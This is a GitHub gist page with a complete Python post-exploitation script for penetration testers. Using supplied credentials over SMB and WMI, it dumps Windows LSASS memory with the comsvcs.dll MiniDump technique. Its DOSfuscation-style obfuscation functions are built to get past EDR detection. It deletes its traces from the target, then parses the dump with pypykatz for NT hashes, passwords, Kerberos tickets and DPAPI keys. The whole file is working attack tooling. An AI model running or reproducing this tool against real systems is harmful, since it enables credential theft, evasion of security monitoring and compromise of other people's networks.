Last active
June 26, 2024 18:32
-
-
Save 3xocyte/276acf752f5d8ed96c6d87fd7dca0740 to your computer and use it in GitHub Desktop.
quickly dump creds from a box you've pwned while living off the land (feat. obfuscation and pypykatz automation)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import argparse | |
import sys | |
import logging | |
import random | |
import string | |
import os | |
from time import sleep | |
from impacket.examples import logger | |
from impacket.smbconnection import SMBConnection | |
from impacket import version | |
from impacket.dcerpc.v5.dtypes import NULL | |
from impacket.dcerpc.v5.dcom import wmi | |
from impacket.dcerpc.v5.dcomrt import DCOMConnection | |
from impacket.smbconnection import SMBConnection | |
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_LEVEL_PKT_INTEGRITY | |
# module-level side effect: set up logging via impacket's example logger helper
# (presumably installs impacket's console log format - confirm against impacket.examples.logger)
logger.init()
# TODO: | |
# * obfuscation functions need some TLC, currently it's possible (though uncommon) | |
# that they'll fail and the created directory needs to be cleaned up manually | |
# * pypykatz functionality is literally tacked on to the end, should be in their own | |
# functions | |
# * add some control over output directory | |
# OPSEC note: | |
# * command line obfuscation will only hide the command line argument that the cmd | |
# process created by Win32_Process.Create is launched with; the rundll32 process's | |
# command line argument property will still look dodgy, but it's the cmd process | |
# that will get the most attention anyway. This tool is for evading blocks on | |
# internal penetration tests, not red teaming in high security environments. | |
def randomise_case(randomise):
    """Return *randomise* with every character independently upper- or lower-cased at random."""
    upper_form = randomise.upper()
    lower_form = randomise.lower()
    picked = []
    # one random.choice per (upper, lower) pair, in order
    for candidates in zip(upper_form, lower_form):
        picked.append(random.choice(candidates))
    return ''.join(picked)
# pretty buggy, needs better tracking for variable name reuse, and a whole refactor | |
# idea from https://github.com/danielbohannon/Invoke-DOSfuscation | |
def obfuscate_char_replace(command):
    """Return a cmd.exe one-liner that rebuilds *command* through character substitution.

    Randomly chosen alphanumeric characters of *command* are swapped for
    lowercase letters/digits that do not occur in it. The returned string
    stores the altered text in a variable, restores it through a chain of
    ``!var:x=y!`` substitutions and finally ``call``s the last variable.

    The result differs on every call. ``random.randrange`` raises
    ``ValueError`` when fewer than three lowercase letters/digits are absent
    from *command*.
    """
    start = randomise_case('cmd /v:ON/c')
    # stand-in candidates: lowercase letters and digits that do not appear in the command
    replace_chars = string.ascii_lowercase + string.digits
    for c in command:
        if c in replace_chars:
            replace_chars = replace_chars.replace(c,'')
    # pool of characters that may be swapped out
    command_alphachar = ''.join(ch for ch in command if ch.isalnum())
    # upper bound on the number of swap attempts made below
    no_chars = random.randrange(2,len(replace_chars))
    var_len = random.randrange(2,10)
    random_var = ''.join(random.choices(string.ascii_lowercase + string.digits, k=(var_len)))
    # NOTE(review): 'here' is never read again in this function
    here = '%s" %s %s=%s"' % (start, randomise_case("set"), random_var, command)
    randomise_characters = []   # original characters already chosen
    random_characters = []      # stand-in characters already chosen
    randomise_characters_dict = {}  # variable name -> {original char: stand-in char}
    # NOTE(review): 'final_random_var' is never read again in this function
    final_random_var = ''.join(random.choices(string.ascii_lowercase + string.digits, k=(var_len)))
    i = 0
    while i < no_chars:
        random_var2 = ''.join(random.choices(string.ascii_lowercase+ string.digits, k=(var_len)))
        replace_char = ''.join(random.choices(replace_chars, k=(1)))
        string_char = ''.join(random.choices(command_alphachar, k=(1)))
        # only record the pair when neither character has been used before
        if not replace_char in random_characters and not string_char in randomise_characters:
            random_characters.append(replace_char)
            randomise_characters.append(string_char)
            assoc_dict = {}
            assoc_dict[string_char] = replace_char
            # a repeated random_var2 overwrites the earlier entry
            randomise_characters_dict[random_var2] = (assoc_dict)
        # NOTE(review): placed at loop level (one increment per attempt); the flattened
        # source does not show whether this belonged inside the 'if' - confirm
        i += 1
    convert_list = []
    call_list = []
    converted_command = '"%s %s=' % (randomise_case("set"), random_var)
    track_reuse = []  # variable names in the order they are emitted
    i = 0
    for k,v in randomise_characters_dict.items():
        for rsc, rc in v.items():
            # print("%s: %s" % (k, v))
            track_reuse.append(k)
            # on the first pass i-1 is -1, which indexes the name just appended, so the
            # else branch runs and the chain starts from random_var; later passes read
            # from the previously emitted variable
            if not k == track_reuse[i-1]:
                convert = '&&%s %s=!%s:%s=%s!' % (randomise_case("set"), k, track_reuse[i-1], rc, rsc)
            else:
                convert = '&&%s %s=!%s:%s=%s!' % (randomise_case("set"), k, random_var, rc, rsc)
            i += 1
            # apply the swap to the text that will be stored in random_var
            command = command.replace(rsc, rc)
            # print(command +"\n")
            convert_list.append(convert)
            call = randomise_case("call")
            call_list.append("&&" + call + " %" + k + '%"')
    command = converted_command + command
    for c in convert_list:
        command +=c
    # only the last call entry is used: it runs the fully restored variable
    command = start + command + call_list[-1]
    return command
# kind of a mess but it's reliable >95% of the time | |
# idea from https://github.com/danielbohannon/Invoke-DOSfuscation | |
def obfuscate_concat(command):
    """Return a cmd.exe one-liner that rebuilds *command* from shuffled variable slices.

    *command* is cut into consecutive slices, each assigned to a randomly
    named variable. The ``set`` statements are emitted in shuffled order, then
    a final variable is assembled from the slices in their original order and
    ``call``ed.

    The result differs on every call. NOTE(review): for short commands
    ``min_slice`` can be 0 or not smaller than ``max_slice``; ``randrange``
    then yields zero-length slices or raises ``ValueError`` - confirm the
    expected input length.
    """
    command_length = len(command)
    start = randomise_case('cmd /c"')
    # slice length bounds, derived from the command length
    min_slice = int(command_length/random.randrange(8, 20))
    max_slice = int(command_length/random.randrange(5, 8))
    slice_dict = {}  # slice index -> {variable name: slice text}
    i = 0 # index
    c = 0 # count
    remaining = command
    random_vars = [] # for preventing variable name reuse
    while c < command_length:
        # attempt bugfix
        random_var = ''.join(random.choices(string.ascii_lowercase + string.ascii_uppercase, k=(random.randrange(2,5))))
        # names are compared upper-cased, so names differing only in case count as reuse
        while random_var.upper() in random_vars:
            random_var = ''.join(random.choices(string.ascii_lowercase + string.ascii_uppercase, k=(random.randrange(2,5))))
        random_vars.append(random_var.upper())
        get_slice_length = random.randrange(min_slice, max_slice)
        save_slice = remaining[:get_slice_length]
        remaining = remaining[get_slice_length:]
        var_dict = {}
        var_dict[random_var] = save_slice
        slice_dict[i]=var_dict
        i += 1
        c += get_slice_length
    dict_length = len(slice_dict)
    keys = list(range(0, dict_length))
    # emit the assignments in random order
    random.shuffle(keys)
    obfuscated_command = ""
    for i in keys:
        for k, v in slice_dict[i].items():
            call_var = "%s %s=%s&&" % (randomise_case("set"), k, v)
            obfuscated_command += call_var
    # name of the variable that will hold the reassembled command; this name is
    # not checked against random_vars
    random_var = ''.join(random.choices(string.ascii_lowercase + string.ascii_uppercase + string.digits, k=(random.randrange(2,5))))
    obfuscated_command = obfuscated_command + randomise_case("call") + randomise_case(" set ") + random_var + "="
    # NOTE(review): 'reconstructed_command' is built but never read
    reconstructed_command = ''
    i = 0
    # reference the slices in their original order
    while i < dict_length:
        for k,v in slice_dict[i].items():
            reconstructed_command += v
            obfuscated_command += "%" + k + "%"
        i += 1
    obfuscated_command += "&&" +randomise_case("call")+" %" + random_var + "%"
    obfuscated = start + obfuscated_command + '"'
    return obfuscated
def create_directory(smb_client, share):
    """Create a directory with a random 3-5 letter lowercase name on *share* and return the name."""
    name_length = random.randrange(3,6)
    letters = random.choices(string.ascii_lowercase, k=name_length)
    dir_name = ''.join(letters)
    smb_client.createDirectory(share, dir_name)
    message = "created directory: %s on %s" % (dir_name, share)
    logging.debug(message)
    return dir_name
def execute_dump(dcom, namespace, dir_name, obfs_concat=False, obfs_replace=False):
    """Start the comsvcs.dll MiniDump command on the target through WMI.

    dcom         -- connection object providing CoCreateInstanceEx
    namespace    -- WMI namespace passed to NTLMLogin
    dir_name     -- directory under C:\\ that receives the dump file
    obfs_concat  -- when True, pass the command through obfuscate_concat
    obfs_replace -- when True (and obfs_concat is not), pass it through
                    obfuscate_char_replace

    Returns the randomly generated dump file name. The function returns right
    after Win32_Process.Create is invoked; it does not wait for the file.
    """
    iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login,wmi.IID_IWbemLevel1Login)
    iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
    iWbemServices= iWbemLevel1Login.NTLMLogin(namespace, NULL, NULL)
    iWbemLevel1Login.RemRelease()
    logging.info("created WMI session with provided credentials")
    # first we get LSASS's pid using WQL
    iEnumWbemClassObject = iWbemServices.ExecQuery('SELECT ProcessId From Win32_Process WHERE Name = "lsass.exe"')
    # take the first row of the result set
    pEnum = iEnumWbemClassObject.Next(0xffffffff,1)[0]
    lsass_pid = pEnum.ProcessId
    iEnumWbemClassObject.RemRelease()
    logging.debug("found lsass PID: %s" % lsass_pid)
    # now we build the command
    directory = "C:\\%s\\" % dir_name
    dump_name = ''.join(random.choices(string.ascii_lowercase, k=random.randrange(3,6)))
    dump_location = directory + dump_name
    # NOTE(review): non-raw string containing \w, \s and \c; these are invalid escape
    # sequences that newer Python versions warn about - confirm whether a raw string is wanted
    comsvcs_command = "rundll32.exe c:\windows\system32\comsvcs.dll"
    full = "full"
    prep_command = "%s, MiniDump %s %s %s" % (comsvcs_command, lsass_pid, dump_location, full)
    logging.debug("command: %s" % prep_command)
    if obfs_concat == True:
        command = obfuscate_concat(prep_command)
        # keep trying until likely EDR triggers aren't in the command
        while "Mini" in command or "Dump" in command or "full" in command:
            command = obfuscate_concat(prep_command)
        logging.debug("obfuscated command: %s" % command)
    elif obfs_replace == True:
        command = obfuscate_char_replace(prep_command)
        # keep trying until likely EDR triggers aren't in the command
        while "Mini" in command or "Dump" in command or "full" in command:
            command = obfuscate_char_replace(prep_command)
        logging.debug("obfuscated command: %s" % command)
    else:
        command = prep_command
    logging.info("executing: %s" % command)
    # create the process
    win32Process,_ = iWbemServices.GetObject("Win32_Process")
    win32Process.Create(command, "C:\\", None)
    win32Process.RemRelease()
    iWbemServices.RemRelease()
    return dump_name
def get_dump(smb_client, target, share, dir_name, dump_name):
    """Download the dump file from *share* into ``<target>_dump/lsass.dmp`` and return that path.

    The download is retried once per second, without limit, until it succeeds.
    """
    remote_path = "%s\\%s" % (dir_name, dump_name)
    local_path = "%s_dump/lsass.dmp" % target
    out_handle = open(local_path,'wb')
    fetched = False
    while not fetched:
        try:
            smb_client.getFile(share, remote_path, out_handle.write)
            logging.info("got dump file: %s" % local_path)
            out_handle.close()
            fetched = True
        except Exception:
            # the remote file may not be readable yet; wait and try again
            logging.debug("failed to get %s, retrying..." % remote_path)
            sleep(1)
    return local_path
def clean_filesystem(smb_client, share, dir_name, dump_name):
    """Delete the dump file and then its directory from *share*.

    Returns True when both deletions succeed; on any exception the error is
    logged at debug level and False is returned.
    """
    try:
        remote_file = "%s\\%s" % (dir_name, dump_name)
        smb_client.deleteFile(share, remote_file)
        logging.debug("deleted %s" % remote_file)
        smb_client.deleteDirectory(share, dir_name)
        logging.debug("removed %s" % dir_name)
    except Exception as err:
        logging.debug(err)
        return False
    else:
        return True
def main():
    """Command-line entry point.

    Parses arguments, logs in over SMB, creates a working directory on C$,
    starts the dump through execute_dump, downloads it with get_dump, removes
    the remote files and, with --parse, runs pypykatz over the local dump and
    prints a summary. Exits with status 1 on setup/login/import failures.
    """
    parser = argparse.ArgumentParser(add_help = True, description = "auto lsass dumping post-exploitation utility (by @3xocyte)")
    parser.add_argument('-u', '--username', action="store", default='', help='valid username')
    parser.add_argument('-p', '--password', action="store", default='', help='valid password')
    parser.add_argument('-d', '--domain', action="store", default='', help='valid domain name')
    parser.add_argument('--nt', action="store", default='', help='nt hash')
    obfuscation_group = parser.add_mutually_exclusive_group()
    # NOTE(review): the defaults below are the string "False", not the boolean; the
    # later '== True' comparisons still evaluate false for it, but a plain truthiness
    # test on these options would not
    obfuscation_group.add_argument('--obfs-concat', action="store_true", default="False", help='obfuscate dump command with variable concacenation (experimental!)')
    obfuscation_group.add_argument('--obfs-char-replace', action="store_true", default="False", help='obfuscate dump command with environment variable char replacement (experimental!)')
    parser.add_argument('--debug', action="store_true", help='debug mode (very verbose!)')
    parser.add_argument('--parse', action="store_true", default=False, help='get pypykatz raw output, json output, and kerberos tickets, also try to display some unique creds')
    parser.add_argument('--dpapi', action="store_true", default=False, help='when using pypykatz, try to display unique dpapi keys')
    parser.add_argument('target', help='ip address or hostname of target')
    # with no arguments at all, show help plus usage examples and exit successfully
    if len(sys.argv) == 1:
        parser.print_help()
        print("\nrequires python3, the impacket and pypykatz packages installed")
        print("\nexamples: ")
        print("\nget an lsass minidump from a single target")
        print("\t./lazykatz.py -d <domain> -u <username> -p '<password>' 192.168.1.12")
        print("\nget an lsass minidump from a single target and quickly parse it for creds")
        print("\t./lazykatz.py -d <domain> -u <username> -p '<password>' --parse 192.168.1.12\n")
        print("\nuse obfuscation with concatenation to get an lsass minidump from a single target, and quickly parse it for creds")
        print("\t./lazykatz.py -d <domain> -u <username> -p '<password>' --parse --obfs-concat 192.168.1.12\n")
        print("\nuse obfuscation with character replacement to get an lsass minidump from a single target")
        print("\t./lazykatz.py -d <domain> -u <username> -p '<password>' --obfs-char-replace 192.168.1.12\n")
        sys.exit(0)
    options = parser.parse_args()
    if options.debug is True:
        logging.getLogger().setLevel(logging.DEBUG)
    else:
        logging.getLogger().setLevel(logging.INFO)
    domain = options.domain
    username = options.username
    password = options.password
    address = options.target
    obfs_concat = options.obfs_concat
    obfs_replace = options.obfs_char_replace
    # when an NT hash is supplied, a placeholder '0' is passed as the LM hash
    if options.nt:
        nthash = options.nt
        lmhash = '0'
    else:
        nthash = ''
        lmhash = ''
    share = "C$"
    # local output directory: ./<target>_dump
    try:
        os.mkdir('./%s_dump' % address)
        logging.debug('created directory: ./%s_dump' % address)
    except FileExistsError as e:
        logging.debug('directory exists')
        pass
    except Exception as e:
        logging.debug('directory creation error: %s' % e)
        sys.exit(1)
    try:
        smb_client = SMBConnection(address, address)
        smb_client.login(username, password, domain, lmhash, nthash)
    except Exception as e:
        logging.info("login failed")
        logging.debug('login error: %s' % e)
        sys.exit(1)
    try:
        smb_client.connectTree(share)
        logging.info("connected to %s using provided credentials" % share)
    except Exception as e:
        import traceback
        traceback.print_exc()
        logging.info("failed to connect to %s" % share)
        logging.debug(e)
        sys.exit(1)
    directory = create_directory(smb_client, share)
    dcom = DCOMConnection(address, username, password, domain, lmhash, nthash)
    namespace = '//%s/root/cimv2' % address
    if obfs_concat == True:
        dump = execute_dump(dcom, namespace, directory, obfs_concat = True)
    elif obfs_replace == True:
        dump = execute_dump(dcom, namespace, directory, obfs_replace = True)
    else:
        dump = execute_dump(dcom, namespace, directory)
    dcom.disconnect()
    dump_output = get_dump(smb_client, address, share, directory, dump)
    if clean_filesystem(smb_client, share, directory, dump):
        logging.info("finished filesystem cleanup")
    smb_client.close()
    logging.info("connections closed")
    # pypykatz stuff, should go into its own function
    if options.parse:
        logging.info("quickly parsing dump file")
        # pypykatz is imported lazily so it is only required with --parse
        try:
            from pypykatz.pypykatz import pypykatz
            from pypykatz.commons.common import UniversalEncoder
            import json
        except:
            logging.error("unable to import pypykatz, try 'sudo pip3 install pypykatz'")
            sys.exit(1)
        # NOTE(review): 'results' is never read again in this function
        results = {}
        try:
            os.mkdir('./%s_dump/kirbi' % address)
            logging.debug('created directory: ./%s_dump' % address)
        except FileExistsError as e:
            logging.debug('directory exists')
            pass
        mimi = pypykatz.parse_minidump_file(dump_output)
        mimi.kerberos_ccache.to_kirbidir('./%s_dump/kirbi' % address)
        logging.debug('dumped kirbi tickets to directory ./%s_dump/kirbi' % address)
        # raw text output is opened in append mode, so repeated runs accumulate
        out_txt_file = open('./%s_dump/pypykatz.txt' % address, 'a')
        for k,v in mimi.to_dict()['logon_sessions'].items():
            out_txt_file.write('%s' % v)
        for c in mimi.to_dict()['orphaned_creds']: # what about orphaned sessions? requires testing
            out_txt_file.write('%s' % c)
        out_txt_file.close()
        logging.debug('wrote raw pypykatz output to ./%s_dump/pypykatz.txt' % address)
        mimi_json = json.dumps(mimi, cls = UniversalEncoder, sort_keys=True)
        out_json_file = open('./%s_dump/pypykatz.json' % address, 'w')
        out_json_file.write(mimi_json)
        out_json_file.close()
        logging.debug('wrote json output to ./%s_dump/pypykatz.json' % address)
        # round-trip through JSON to work with plain dicts and lists below
        results_json = json.loads(mimi_json)
        # entries already printed, used to suppress duplicates
        pwned_msv = []
        pwned_wdigest = []
        pwned_dpapi = []
        for session in results_json['logon_sessions']:
            user = results_json['logon_sessions'][session]['username']
            if user:
                # each section is best-effort: any error (e.g. a missing key) skips it silently
                try:
                    msv = results_json['logon_sessions'][session]['msv_creds'][0]
                    if msv not in pwned_msv:
                        if msv['NThash']:
                            print()
                            print('[MSV]')
                            print("{: <20}{}".format("domain", msv['domainname']))
                            print("{: <20}{}".format("username", msv['username']))
                            print("{: <20}{}".format("nt hash", msv['NThash']))
                            print("{: <20}{}".format("sha1 hash", msv['SHAHash']))
                            # NOTE(review): nesting level of this append is not recoverable
                            # from the flattened source - confirm
                            pwned_msv.append(msv)
                except:
                    pass
                try:
                    # NOTE(review): this section is labelled WDigest but reads 'msv_creds' - confirm
                    wdigest = results_json['logon_sessions'][session]['msv_creds'][0]
                    if wdigest not in pwned_wdigest:
                        if wdigest['password']:
                            print()
                            print('[WDigest]')
                            print("{: <20}{}".format("domain", wdigest['domainname']))
                            print("{: <20}{}".format("username", wdigest['username']))
                            print("{: <20}{}".format("password", wdigest['password']))
                            pwned_wdigest.append(wdigest)
                except:
                    pass
                if options.dpapi:
                    try:
                        dpapi = results_json['logon_sessions'][session]['dpapi_creds']
                        if dpapi not in pwned_dpapi:
                            print()
                            print('[DPAPI]')
                            for cred in dpapi:
                                print("{: <20}{}".format("username", user))
                                print("{: <20}{}".format("key guid", cred['key_guid']))
                                print("{: <20}{}".format("masterkey", cred['masterkey']))
                                print("{: <20}{}".format("sha1 masterkey", cred['sha1_masterkey']))
                            # NOTE(review): placed after the loop; the flattened source
                            # does not show whether it was inside it - confirm
                            pwned_dpapi.append(dpapi)
                    except:
                        pass
    else:
        sys.exit()
# run main() only when the file is executed as a script, not when imported
if __name__ == '__main__':
    main()
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This script depended on the then-current version of pypykatz, which has since had breaking changes.